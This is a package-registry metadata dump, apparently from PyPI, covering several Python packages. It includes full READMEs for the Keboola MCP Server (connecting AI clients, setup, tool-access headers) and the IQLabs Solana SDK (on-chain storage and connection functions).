"pymongo<5,>=4; extra == \"all\"",
"python-pptx; extra == \"all\""
] | [] | [] | [] | [
"Homepage, https://github.com/kellerza/data-playbook",
"Repository, https://github.com/kellerza/data-playbook"
] | uv/0.10.2 {"installer":{"name":"uv","version":"0.10.2","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:29:06.944808 | dataplaybook-1.2.10.tar.gz | 43,278 | ee/c6/4115ca15e35ae55439b891e964146ab09aefa9a42fc289d54b448dc98bb3/dataplaybook-1.2.10.tar.gz | source | sdist | null | false | 994f0e137eb1f390151d62892987cf15 | 3929bbabe8c3d6f16349137c1654446517c2ccee2fc74d239add413bbd6c1748 | eec64115ca15e35ae55439b891e964146ab09aefa9a42fc289d54b448dc98bb3 | null | [] | 248 |
2.4 | pytomofilt | 0.0.1a0 | Tomographic filtering in python | # pytomofilt
Pytomofilt is a python package for tomographic filtering of synthetic seismic velocity models using resolution operators from the RTS suite of models, which includes S20RTS, S40RTS, and SP12RTS. Pytomofilt is released under an MIT license.
| text/markdown | Justin Leung, Andrew Walker | null | null | null | MIT License Copyright (c) 2024 justinleung4732 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | null | [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Science/Research"
] | [] | null | null | <=3.12,>=3.9 | [] | [] | [] | [
"pyshtools",
"cartopy",
"terratools",
"numba",
"scipy",
"numpy",
"typer",
"typing_extensions",
"pytest; extra == \"test\"",
"pytest-cov; extra == \"test\""
] | [] | [] | [] | [] | uv/0.9.13 {"installer":{"name":"uv","version":"0.9.13"},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T09:28:46.968458 | pytomofilt-0.0.1a0-py3-none-any.whl | 17,612 | c1/13/75bd990ac1024ef32a3b309857d50e30da935174dc07f7ff44f9092944b1/pytomofilt-0.0.1a0-py3-none-any.whl | py3 | bdist_wheel | null | false | 47c8b2b945a9d0b000cd09ee54c5dddd | 3525ff091808a351ceb98075ba401b4c3da376a61c63be0c6b164ee9b20c1b42 | c11375bd990ac1024ef32a3b309857d50e30da935174dc07f7ff44f9092944b1 | null | [
"LICENSE"
] | 228 |
2.4 | pitchmeld | 0.50.0 | Please see https://pitchmeld.ing | # Pitchmeld
Copyright 2025 Gilles Degottex.
Main website and account creation can be found here: https://pitchmeld.ing
Documentation of the latest version can be found here: https://doc.pitchmeld.ing
You can also find the documentation in the python package.
License is proprietary, please see doc/LICENSE.md file in this package or see https://doc.pitchmeld.ing/license.html or contact the author contact@pitchmeld.ing
| text/markdown | Gilles Degottex | dev@pitchmeld.ing | null | null | LicenseRef-Proprietary | null | [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent",
"Development Status :: 1 - Planning",
"Environment :: Console"
] | [] | https://doc.pitchmeld.ing | null | >=3.9 | [] | [] | [] | [
"numpy>=1.0"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:28:41.717293 | pitchmeld-0.50.0-cp39-cp39-win_amd64.whl | 3,530,198 | fc/56/e37a1773ecacd444653f8e0ca557038846d1cab9db81809bac707dffaefa/pitchmeld-0.50.0-cp39-cp39-win_amd64.whl | cp39 | bdist_wheel | null | false | 222fbd213d2f1b737ba47b490139d86c | af958b0beac2fe8406a470abee803c5504e084d836a6c8dce24c0bf2f2585d7c | fc56e37a1773ecacd444653f8e0ca557038846d1cab9db81809bac707dffaefa | null | [
"LICENSE.md"
] | 659 |
2.4 | keboola-mcp-server | 1.44.7 | MCP server for interacting with Keboola Connection | [](https://deepwiki.com/keboola/mcp-server)
# Keboola MCP Server
> Connect your AI agents, MCP clients (**Cursor**, **Claude**, **Windsurf**, **VS Code** ...) and other AI assistants to Keboola. Expose data, transformations, SQL queries, and job triggers—no glue code required. Deliver the right data to agents when and where they need it.
## Overview
Keboola MCP Server is an open-source bridge between your Keboola project and modern AI tools. It turns Keboola features—like storage access, SQL transformations, and job triggers—into callable tools for Claude, Cursor, CrewAI, LangChain, Amazon Q, and more.
- [Quick Start](#-quick-start-remote-mcp-server-easiest-way)
- [Local Setup](#local-mcp-server-setup-custom-or-dev-way)
## Features
With the AI Agent and MCP Server, you can:
- **Storage**: Query tables directly and manage table or bucket descriptions
- **Components**: Create, List and inspect extractors, writers, data apps, and transformation configurations
- **SQL**: Create SQL transformations with natural language
- **Jobs**: Run components and transformations, and retrieve job execution details
- **Flows**: Build and manage workflow pipelines using Conditional Flows and Orchestrator Flows.
- **Data Apps**: Create, deploy and manage Keboola Streamlit Data Apps displaying your queries over storage data.
- **Metadata**: Search, read, and update project documentation and object metadata using natural language
- **Dev Branches**: Work safely in development branches outside of production, where all operations are scoped to the selected branch.
---
## 🚀 Quick Start: Remote MCP Server (Easiest Way)
<div class="alert alert-warning" role="alert">
<strong>⚠️ SSE Transport Decommissioning:</strong> The SSE transport is deprecated and will be removed from the Keboola MCP Server on 2026-Mar-31. Please migrate to the Streamable HTTP transport and use the <code>/mcp</code> endpoints instead of <code>/sse</code>.
</div>
The easiest way to use Keboola MCP Server is through our **Remote MCP Server**. This hosted solution eliminates the need for local setup, configuration, or installation.
### What is the Remote MCP Server?
Our remote server is hosted on every multi-tenant Keboola stack and supports OAuth authentication. You can connect to it from any AI assistant that supports remote Streamable HTTP connection and OAuth authentication.
### How to Connect
1. **Get your remote server URL**: Navigate to your Keboola Project Settings → `MCP Server` tab
2. **Copy the server URL**: It will look like `https://mcp.<YOUR_REGION>.keboola.com/mcp`
3. **Configure your AI assistant**: Paste the URL into your AI assistant's MCP settings
4. **Authenticate**: You'll be prompted to authenticate with your Keboola account and select your project
### Supported Clients
- **[Cursor](https://cursor.com)**: Use the "Install In Cursor" button in your project's MCP Server settings or click
this button
[](cursor://anysphere.cursor-deeplink/mcp/install?name=keboola&config=eyJ1cmwiOiJodHRwczovL21jcC51cy1lYXN0NC5nY3Aua2Vib29sYS5jb20vbWNwIn0%3D)
- **[Claude Desktop](https://claude.ai)**: Add the integration via Settings → Integrations
- **[Claude Code](https://www.anthropic.com/)**: Install using `claude mcp add --transport http keboola <URL>` (see below for details)
- **[Windsurf](https://windsurf.ai)**: Configure with the remote server URL
- **[Make](https://make.com)**: Configure with the remote server URL
- **Other MCP clients**: Configure with the remote server URL
#### Claude Code Setup
Claude Code is a command-line interface tool that allows you to interact with Claude using your terminal. You can install the Keboola MCP Server integration using a simple command.
**Installation:**
Run the following command in your terminal, replacing `<YOUR_REGION>` with your Keboola region:
```bash
claude mcp add --transport http keboola https://mcp.<YOUR_REGION>.keboola.com/mcp
```
**Region-specific commands:**
| Region | Installation Command |
|--------|----------------------|
| US Virginia AWS | `claude mcp add --transport http keboola https://mcp.keboola.com/mcp` |
| US Virginia GCP | `claude mcp add --transport http keboola https://mcp.us-east4.gcp.keboola.com/mcp` |
| EU Frankfurt AWS | `claude mcp add --transport http keboola https://mcp.eu-central-1.keboola.com/mcp` |
| EU Ireland Azure | `claude mcp add --transport http keboola https://mcp.north-europe.azure.keboola.com/mcp` |
| EU Frankfurt GCP | `claude mcp add --transport http keboola https://mcp.europe-west3.gcp.keboola.com/mcp` |
**Usage:**
Once installed, you can use the Keboola MCP Server in Claude Code by typing `/mcp` in your conversation and selecting the Keboola tools you want to use.
**Authentication:**
When you first use the Keboola MCP Server in Claude Code, a browser window will open prompting you to:
1. Log in with your Keboola account
2. Select the project you want to connect to
3. Authorize the connection
After authentication, you can start using Keboola tools directly from Claude Code.
For detailed setup instructions and region-specific URLs, see our [Remote Server Setup documentation](https://help.keboola.com/ai/mcp-server/#remote-server-setup).
### Using Development Branches
You can work safely in [Keboola development branches](https://help.keboola.com/components/branches/) without affecting your production data. The remotely hosted MCP Servers respect the `KBC_BRANCH_ID` parameter and will scope all operations to the specified branch. You can find the development branch ID in the URL when navigating to the development branch in the UI, for example: `https://connection.us-east4.gcp.keboola.com/admin/projects/PROJECT_ID/branch/BRANCH_ID/dashboard`. The branch ID must be included in each request using the header `X-Branch-Id: <branchId>`, otherwise the MCP Server uses production branch as default. This should be managed by the AI client or the environment handling the server connection.
### Tool Authorization and Access Control
When using HTTP-based transports (Streamable HTTP), you can control which tools are available to clients using HTTP headers. This is useful for restricting AI agent capabilities or enforcing compliance policies.
#### Authorization Headers
| Header | Description | Example |
|--------|-------------|---------|
| `X-Allowed-Tools` | Comma-separated list of allowed tools | `get_configs,get_buckets,query_data` |
| `X-Disallowed-Tools` | Comma-separated list of tools to exclude | `create_config,run_job` |
| `X-Read-Only-Mode` | Restrict to read-only tools only | `true`, `1`, or `yes` |
#### Filter Behavior
Filters apply in order: allowed → read-only intersection → disallowed exclusion. Empty headers = no restriction.
#### Read-Only Tools
Read-only tools are those annotated with `readOnlyHint=True`. These tools only retrieve information without making any changes to your Keboola project. For the current list of read-only tools, see the [TOOLS.md](TOOLS.md) file which is an auto-generated snapshot of the actual tool set.
#### Example: Read-Only Access
```
X-Read-Only-Mode: true
```
For detailed documentation, see [developers.keboola.com/integrate/mcp/#tool-authorization-and-access-control](https://developers.keboola.com/integrate/mcp/#tool-authorization-and-access-control).
---
## Local MCP Server Setup (Custom or Dev Way)
Run the MCP server on your own machine for full control and easy development. Choose this when you want to customize tools, debug locally, or iterate quickly. You’ll clone the repo, set Keboola credentials via environment variables or headers depending on the server transport, install dependencies, and start the server. This approach offers maximum flexibility (custom tools, local logging, offline iteration) but requires manual setup and you manage updates and secrets yourself.
The server supports multiple **transport** options, which can be selected by providing the `--transport <transport>` argument when starting the server:
- `stdio` - Default when `--transport` is not specified. Standard input/output, typically used for local deployment with a single client.
- `streamable-http` - Runs the server remotely over HTTP with a bidirectional streaming channel, allowing the client and server to continuously exchange messages. Connect via <url>/mcp (e.g., http://localhost:8000/mcp).
- `sse` - **Deprecated (will be removed on 2026-Mar-31)**, use `streamable-http` instead. Runs the server remotely using Server-Sent Events (SSE) for one-way event streaming from server to client. Connect via <url>/sse (e.g., http://localhost:8000/sse).
- `http-compat` - A custom transport supporting both `SSE` and `streamable-http`. It is currently used on Keboola remote servers but will be replaced by `streamable-http` only when SSE is removed.
For client–server communication, Keboola credentials must be provided to enable working with your project in your Keboola Region. The following are required: `KBC_STORAGE_TOKEN`, `KBC_STORAGE_API_URL`, `KBC_WORKSPACE_SCHEMA` and optionally `KBC_BRANCH_ID`. You can provide these in two ways:
- For personal use (mainly with stdio transport): set the environment variables before starting the server. All requests will reuse these predefined credentials.
- For multi-user use: include the variables in the request headers so that each request uses the credentials provided with it.
### KBC_STORAGE_TOKEN
This is your authentication token for Keboola:
For instructions on how to create and manage Storage API tokens, refer to the [official Keboola documentation](https://help.keboola.com/management/project/tokens/).
**Note**: If you want the MCP server to have limited access, use custom storage token, if you want the MCP to access everything in your project, use the master token.
### KBC_WORKSPACE_SCHEMA
This identifies your workspace in Keboola and is used for SQL queries. However, this is **only required if you're using a custom storage token** instead of the Master Token:
- If using [Master Token](https://help.keboola.com/management/project/tokens/#master-tokens): The workspace is created automatically behind the scenes
- If using [custom storage token](https://help.keboola.com/management/project/tokens/#limited-tokens): Follow this [Keboola guide](https://help.keboola.com/tutorial/manipulate/workspace/) to get your KBC_WORKSPACE_SCHEMA
**Note**: When creating a workspace manually, check Grant read-only access to all Project data option
**Note**: KBC_WORKSPACE_SCHEMA is called Dataset Name in BigQuery workspaces, you simply click connect and copy the Dataset Name
### KBC_STORAGE_API_URL (Keboola Region)
Your Keboola Region API URL depends on your deployment region. You can determine your region by looking at the URL in your browser when logged into your Keboola project:
| Region | API URL |
|--------|---------|
| AWS North America | `https://connection.keboola.com` |
| AWS Europe | `https://connection.eu-central-1.keboola.com` |
| Google Cloud EU | `https://connection.europe-west3.gcp.keboola.com` |
| Google Cloud US | `https://connection.us-east4.gcp.keboola.com` |
| Azure EU | `https://connection.north-europe.azure.keboola.com` |
### KBC_BRANCH_ID (Optional)
To operate on a specific [Keboola development branch](https://help.keboola.com/components/branches/), set the branch ID using the `KBC_BRANCH_ID` parameter. The MCP server scopes its functionality to the specified branch, ensuring all changes remain isolated and do not impact the production branch.
- If not provided, the server uses the production branch by default.
- For development work, set `KBC_BRANCH_ID` to the numeric ID of your branch (e.g., `123456`). You can find the development branch ID in the URL when navigating to the development branch in the UI, for example: `https://connection.us-east4.gcp.keboola.com/admin/projects/PROJECT_ID/branch/BRANCH_ID/dashboard`.
- On remote transports, you can override per-request with the HTTP header `X-Branch-Id: <branchId>` or `KBC_BRANCH_ID: <branchId>`.
### Installation
Make sure you have:
- [ ] Python 3.10+ installed
- [ ] Access to a Keboola project with admin rights
- [ ] Your preferred MCP client (Claude, Cursor, etc.)
**Note**: Make sure you have `uv` installed. The MCP client will use it to automatically download and run the Keboola MCP Server.
**Installing uv**:
*macOS/Linux*:
```bash
#if homebrew is not installed on your machine use:
# /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install using Homebrew
brew install uv
```
*Windows*:
```powershell
# Using the installer script
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"
# Or using pip
pip install uv
# Or using winget
winget install --id=astral-sh.uv -e
```
For more installation options, see the [official uv documentation](https://docs.astral.sh/uv/getting-started/installation/).
### Running Keboola MCP Server
There are four ways to use the Keboola MCP Server, depending on your needs:
### Option A: Integrated Mode (Recommended)
In this mode, Claude or Cursor automatically starts the MCP server for you. **You do not need to run any commands in your terminal**.
1. Configure your MCP client (Claude/Cursor) with the appropriate settings
2. The client will automatically launch the MCP server when needed
#### Claude Desktop Configuration
1. Go to Claude (top left corner of your screen) -> Settings → Developer → Edit Config (if you don't see the claude_desktop_config.json, create it)
2. Add the following configuration:
3. Restart Claude desktop for changes to take effect
```json
{
"mcpServers": {
"keboola": {
"command": "uvx",
"args": ["keboola_mcp_server --transport <transport>"],
"env": {
"KBC_STORAGE_API_URL": "https://connection.YOUR_REGION.keboola.com",
"KBC_STORAGE_TOKEN": "your_keboola_storage_token",
"KBC_WORKSPACE_SCHEMA": "your_workspace_schema",
"KBC_BRANCH_ID": "your_branch_id_optional"
}
}
}
}
```
Config file locations:
- **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
- **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
#### Cursor Configuration
1. Go to Settings → MCP
2. Click "+ Add new global MCP Server"
3. Configure with these settings:
```json
{
"mcpServers": {
"keboola": {
"command": "uvx",
"args": ["keboola_mcp_server --transport <transport>"],
"env": {
"KBC_STORAGE_API_URL": "https://connection.YOUR_REGION.keboola.com",
"KBC_STORAGE_TOKEN": "your_keboola_storage_token",
"KBC_WORKSPACE_SCHEMA": "your_workspace_schema",
"KBC_BRANCH_ID": "your_branch_id_optional"
}
}
}
}
```
**Note**: Use short, descriptive names for MCP servers. Since the full tool name includes the server name and must stay under ~60 characters, longer names may be filtered out in Cursor and will not be displayed to the Agent.
#### Cursor Configuration for Windows WSL
When running the MCP server from Windows Subsystem for Linux with Cursor AI, use this configuration:
```json
{
"mcpServers": {
"keboola":{
"command": "wsl.exe",
"args": [
"bash",
"-c '",
"export KBC_STORAGE_API_URL=https://connection.YOUR_REGION.keboola.com &&",
"export KBC_STORAGE_TOKEN=your_keboola_storage_token &&",
"export KBC_WORKSPACE_SCHEMA=your_workspace_schema &&",
"export KBC_BRANCH_ID=your_branch_id_optional &&",
"/snap/bin/uvx keboola_mcp_server --transport <transport>",
"'"
]
}
}
}
```
### Option B: Local Development Mode
For developers working on the MCP server code itself:
1. Clone the repository and set up a local environment
2. Configure Claude/Cursor to use your local Python path:
```json
{
"mcpServers": {
"keboola": {
"command": "/absolute/path/to/.venv/bin/python",
"args": [
"-m",
"keboola_mcp_server --transport <transport>"
],
"env": {
"KBC_STORAGE_API_URL": "https://connection.YOUR_REGION.keboola.com",
"KBC_STORAGE_TOKEN": "your_keboola_storage_token",
"KBC_WORKSPACE_SCHEMA": "your_workspace_schema",
"KBC_BRANCH_ID": "your_branch_id_optional"
}
}
}
}
```
### Option C: Manual CLI Mode (For Testing Only)
You can run the server manually in a terminal for testing or debugging:
```bash
# Set environment variables
export KBC_STORAGE_API_URL=https://connection.YOUR_REGION.keboola.com
export KBC_STORAGE_TOKEN=your_keboola_storage_token
export KBC_WORKSPACE_SCHEMA=your_workspace_schema
export KBC_BRANCH_ID=your_branch_id_optional
uvx keboola_mcp_server --transport streamable-http
```
> **Note**: This mode is primarily for debugging or testing. For normal use with Claude or Cursor,
> you do not need to manually run the server.
> **Note**: The server will use the Streamable HTTP transport and listen on `localhost:8000` for incoming connections at `/mcp`.
> You can use `--port` and `--host` parameters to make it listen elsewhere.
### Option D: Using Docker
```shell
docker pull keboola/mcp-server:latest
docker run \
--name keboola_mcp_server \
--rm \
-it \
-p 127.0.0.1:8000:8000 \
-e KBC_STORAGE_API_URL="https://connection.YOUR_REGION.keboola.com" \
-e KBC_STORAGE_TOKEN="YOUR_KEBOOLA_STORAGE_TOKEN" \
-e KBC_WORKSPACE_SCHEMA="YOUR_WORKSPACE_SCHEMA" \
-e KBC_BRANCH_ID="YOUR_BRANCH_ID_OPTIONAL" \
keboola/mcp-server:latest \
--transport streamable-http \
--host 0.0.0.0
```
> **Note**: The server will use the Streamable HTTP transport and listen on `localhost:8000` for incoming connections at `/mcp`.
> You can change `-p` to map the container's port somewhere else.
### Do I Need to Start the Server Myself?
| Scenario | Need to Run Manually? | Use This Setup |
|----------|----------------------|----------------|
| Using Claude/Cursor | No | Configure MCP in app settings |
| Developing MCP locally | No (Claude starts it) | Point config to python path |
| Testing CLI manually | Yes | Use terminal to run |
| Using Docker | Yes | Run docker container |
## Using MCP Server
Once your MCP client (Claude/Cursor) is configured and running, you can start querying your Keboola data:
### Verify Your Setup
You can start with a simple query to confirm everything is working:
```text
What buckets and tables are in my Keboola project?
```
### Examples of What You Can Do
**Data Exploration:**
- "What tables contain customer information?"
- "Run a query to find the top 10 customers by revenue"
**Data Analysis:**
- "Analyze my sales data by region for the last quarter"
- "Find correlations between customer age and purchase frequency"
**Data Pipelines:**
- "Create a SQL transformation that joins customer and order tables"
- "Start the data extraction job for my Salesforce component"
## Compatibility
### MCP Client Support
| **MCP Client** | **Support Status** | **Connection Method** |
|----------------|-------------------|----------------------|
| Claude (Desktop & Web) | ✅ supported | stdio |
| Cursor | ✅ supported | stdio |
| Windsurf, Zed, Replit | ✅ Supported | stdio |
| Codeium, Sourcegraph | ✅ Supported | HTTP+SSE |
| Custom MCP Clients | ✅ Supported | HTTP+SSE or stdio |
## Supported Tools
**Note:** Your AI agents will automatically adjust to new tools.
For a complete list of available tools with detailed descriptions, parameters, and usage examples, see [TOOLS.md](TOOLS.md).
## Troubleshooting
### Common Issues
| Issue | Solution |
|-------|----------|
| **Authentication Errors** | Verify `KBC_STORAGE_TOKEN` is valid |
| **Workspace Issues** | Confirm `KBC_WORKSPACE_SCHEMA` is correct |
| **Connection Timeout** | Check network connectivity |
## Development
### Installation
Basic setup:
```bash
uv sync --extra dev
```
With the basic setup, you can use `uv run tox` to run tests and check code style.
Recommended setup:
```bash
uv sync --extra dev --extra tests --extra integtests --extra codestyle
```
With the recommended setup, packages for testing and code style checking will be installed which allows IDEs like
VsCode or Cursor to check the code or run tests during development.
### Integration tests
To run integration tests locally, use `uv run tox -e integtests`.
NOTE: You will need to set the following environment variables:
- `INTEGTEST_STORAGE_API_URL`
- `INTEGTEST_STORAGE_TOKEN`
- `INTEGTEST_WORKSPACE_SCHEMA`
In order to get these values, you need a dedicated Keboola project for integration tests.
### Updating `uv.lock`
Update the `uv.lock` file if you have added or removed dependencies. Also consider updating the lock with newer dependency
versions when creating a release (`uv lock --upgrade`).
### Updating Tool Documentation
When you make changes to any tool descriptions (docstrings in tool functions), you must regenerate the `TOOLS.md` documentation file to reflect these changes:
```bash
uv run python -m src.keboola_mcp_server.generate_tool_docs
```
## Support and Feedback
**⭐ The primary way to get help, report bugs, or request features is by [opening an issue on GitHub](https://github.com/keboola/mcp-server/issues/new). ⭐**
The development team actively monitors issues and will respond as quickly as possible. For general information about Keboola, please use the resources below.
## Resources
- [User Documentation](https://help.keboola.com/)
- [Developer Documentation](https://developers.keboola.com/)
- [Keboola Platform](https://www.keboola.com)
- [Issue Tracker](https://github.com/keboola/mcp-server/issues/new) ← **Primary contact method for MCP Server**
## Connect
- [LinkedIn](https://www.linkedin.com/company/keboola)
- [Twitter](https://x.com/keboola)
- [Changelog](https://changelog.keboola.com/)
[//]: # (mcp-name: com.keboola/mcp -- keep this line for registry.modelcontextprotocol.io)
| text/markdown | null | Keboola <devel@keboola.com> | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"cryptography~=46.0",
"fastmcp==2.14.1",
"httpx-retries~=0.4",
"httpx~=0.28",
"json-log-formatter~=1.1",
"jsonpath-ng~=1.7",
"jsonschema~=4.25",
"mcp==1.24.0",
"pydantic~=2.12",
"pyjwt~=2.10",
"pyyaml~=6.0",
"sqlglot~=28.5",
"toon-format~=0.9.0b1",
"black~=25.11; extra == \"codestyle\"",
"flake8-bugbear~=25.11; extra == \"codestyle\"",
"flake8-colors~=0.1; extra == \"codestyle\"",
"flake8-isort~=7.0; extra == \"codestyle\"",
"flake8-pyproject~=1.2; extra == \"codestyle\"",
"flake8-pytest-style~=2.2; extra == \"codestyle\"",
"flake8-quotes~=3.4; extra == \"codestyle\"",
"flake8-typing-imports~=1.17; extra == \"codestyle\"",
"flake8~=7.3; extra == \"codestyle\"",
"isort~=7.0; extra == \"codestyle\"",
"pep8-naming~=0.15; extra == \"codestyle\"",
"tox~=4.32; extra == \"dev\"",
"kbcstorage~=0.9; extra == \"integtests\"",
"pytest-asyncio~=1.3; extra == \"tests\"",
"pytest-cov~=7.0; extra == \"tests\"",
"pytest-datadir~=1.8; extra == \"tests\"",
"pytest-mock~=3.15; extra == \"tests\"",
"pytest~=9.0; extra == \"tests\"",
"python-dateutil~=2.9; extra == \"tests\"",
"python-dotenv~=1.2; extra == \"tests\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.9.25 | 2026-02-20T09:28:38.396055 | keboola_mcp_server-1.44.7-py3-none-any.whl | 199,288 | d6/68/57a151bb53abaa6e0fe1a53e8d0a102192f5a106790cc8e2600eac18f98b/keboola_mcp_server-1.44.7-py3-none-any.whl | py3 | bdist_wheel | null | false | 3157819f9efb31e1d07299502ef3a5eb | 19c55311f3ff2e5c325259bb981f12854180ada5cb4621080e360c5abbd16546 | d66857a151bb53abaa6e0fe1a53e8d0a102192f5a106790cc8e2600eac18f98b | MIT | [
"LICENSE"
] | 169 |
2.4 | iqlabs-solana-sdk | 0.1.5 | IQLabs Solana SDK for Python — on-chain data storage, database tables, and connections | # IQLabs SDK (Python)
> **Draft**: This document is in progress and will be refined.
---
## Table of Contents
1. [Core Concepts](#core-concepts)
- [Data Storage (Code In)](#data-storage-code-in)
- [User State PDA](#user-state-pda)
- [Connection PDA](#connection-pda)
- [Database Tables](#database-tables)
2. [Function Details](#function-details)
- [Data Storage and Retrieval](#data-storage-and-retrieval)
- [Connection Management](#connection-management)
- [Table Management](#table-management)
- [Environment Settings](#environment-settings)
2.1. [Advanced Functions](#advanced-functions) (list only)
---
## Core Concepts
These are the key concepts to know before using the IQLabs SDK.
---
### Data Storage (Code In)
This is how you store any data (files, text, JSON) on-chain.
#### How is it stored?
Depending on data size, the SDK picks the optimal method:
- **Small data (< 700 bytes)**: store immediately, fastest
- **Medium data (< 8.5 KB)**: split into multiple transactions
- **Large data (>= 8.5 KB)**: upload in parallel for speed
#### Key related functions
- [`code_in()`](#code_in): upload data and get a transaction ID
- [`read_code_in()`](#read_code_in): read data back from a transaction ID
---
### User State PDA
An on-chain profile account for a user.
#### What gets stored?
- Profile info (name, profile picture, bio, etc.)
- Number of uploaded files
- Friend request records
> **Note**: Friend requests are not stored as values in the PDA; they are sent as transactions.
#### When is it created?
It is created automatically the first time you call [`code_in()`](#code_in). No extra setup is required, but the first user may need to sign twice.
---
### Connection PDA
An on-chain account that manages relationships between two users (friends, messages, etc.).
#### What states can it have?
- **pending**: a friend request was sent but not accepted yet
- **approved**: the request was accepted and the users are connected
- **blocked**: one side blocked the other
> **Important**: A blocked connection can only be unblocked by the blocker.
#### Key related functions
- [`request_connection()`](#request_connection): send a friend request (creates pending)
- [`manage_connection()`](#manage_connection): approve/reject/block/unblock a request
- [`read_connection()`](#read_connection): check current relationship status
- [`write_connection_row()`](#write_connection_row): exchange messages/data with a connected friend
- [`fetch_user_connections()`](#fetch_user_connections): fetch all connections (sent & received friend requests)
---
### Database Tables
Store JSON data in tables like a database.
#### How are tables created?
There is no dedicated "create table" function. The first write via [`write_row()`](#write_row) creates the table automatically.
> **Note**: A table is uniquely identified by the combination of `db_root_id` and `table_seed` (table name).
#### Key related functions
- [`write_row()`](#write_row): add a new row (creates the table if missing)
- [`read_table_rows()`](#read_table_rows): read rows from a table
- [`get_tablelist_from_root()`](#get_tablelist_from_root): list all tables in a database
- [`fetch_inventory_transactions()`](#fetch_inventory_transactions): list uploaded files
---
## Function Details
### Data Storage and Retrieval
#### `code_in()`
| **Parameters** | `connection`: Solana RPC AsyncClient<br>`signer`: Keypair or WalletSigner<br>`chunks`: data to upload (list[str])<br>`filename`: optional filename (str or None)<br>`method`: upload method (int, default: 0)<br>`filetype`: file type hint (str, default: '')<br>`on_progress`: optional progress callback (Callable[[int], None]) |
|----------|--------------------------|
| **Returns** | Transaction signature (str) |
**Example:**
```python
from iqlabs import writer
from solana.rpc.async_api import AsyncClient
from solders.keypair import Keypair
# Upload data
signature = await writer.code_in(connection, signer, ['Hello, blockchain!'])
# Upload with filename
signature = await writer.code_in(connection, signer, ['file contents here'], filename='hello.txt')
```
---
#### `read_code_in()`
| **Parameters** | `tx_signature`: transaction signature (str)<br>`speed`: rate limit profile (optional, str)<br>`on_progress`: optional progress callback (Callable[[int], None]) |
|----------|--------------------------|
| **Returns** | dict with `metadata` (str) and `data` (str or None) |
**Example:**
```python
from iqlabs import reader
result = await reader.read_code_in('5Xg7...')
print(result['data']) # 'Hello, blockchain!'
print(result['metadata']) # JSON string with file metadata
```
---
### Connection Management
#### `request_connection()`
| **Parameters** | `connection`: AsyncClient<br>`signer`: Keypair<br>`db_root_id`: database ID (bytes or str)<br>`party_a`: first user pubkey (str)<br>`party_b`: second user pubkey (str)<br>`table_name`: connection table name (str or bytes)<br>`columns`: column list (list[str or bytes])<br>`id_col`: ID column (str or bytes)<br>`ext_keys`: extension keys (list[str or bytes]) |
|----------|--------------------------|
| **Returns** | Transaction signature (str) |
**Example:**
```python
from iqlabs import writer
await writer.request_connection(
connection, signer, 'my-db',
my_wallet_address, friend_wallet_address,
'dm_table', ['message', 'timestamp'], 'message_id', []
)
```
---
#### `manage_connection()`
> **Note**: There is no high-level SDK wrapper for this function. Use the contract-level instruction builder directly.
| **Parameters** | `builder`: InstructionBuilder<br>`accounts`: dict with `db_root`, `connection_table`, `signer`<br>`args`: dict with `db_root_id`, `connection_seed`, `new_status` |
|----------|--------------------------|
| **Returns** | Instruction |
**Example:**
```python
from iqlabs import contract
# Create an instruction builder
builder = contract.create_instruction_builder(contract.PROGRAM_ID)
# Approve a friend request
approve_ix = contract.manage_connection_instruction(
builder,
{"db_root": db_root, "connection_table": connection_table, "signer": my_pubkey},
{"db_root_id": db_root_id, "connection_seed": connection_seed, "new_status": contract.CONNECTION_STATUS_APPROVED}
)
# Block a user
block_ix = contract.manage_connection_instruction(
builder,
{"db_root": db_root, "connection_table": connection_table, "signer": my_pubkey},
{"db_root_id": db_root_id, "connection_seed": connection_seed, "new_status": contract.CONNECTION_STATUS_BLOCKED}
)
```
---
#### `read_connection()`
| **Parameters** | `db_root_id`: database ID (bytes or str)<br>`party_a`: first wallet (str)<br>`party_b`: second wallet (str) |
|----------|--------------------------|
| **Returns** | dict with `status`, `requester`, `blocker` |
**Example:**
```python
from iqlabs import reader
conn_info = await reader.read_connection('my-db', party_a, party_b)
print(conn_info['status']) # 'pending' | 'approved' | 'blocked'
```
---
#### `write_connection_row()`
| **Parameters** | `connection`: AsyncClient<br>`signer`: Keypair<br>`db_root_id`: database ID (bytes or str)<br>`connection_seed`: connection seed (bytes or str)<br>`row_json`: JSON data (str) |
|----------|--------------------------|
| **Returns** | Transaction signature (str) |
**Example:**
```python
from iqlabs import writer
import json
await writer.write_connection_row(
connection, signer, 'my-db', connection_seed,
json.dumps({"message_id": "123", "message": "Hello friend!", "timestamp": 1234567890})
)
```
---
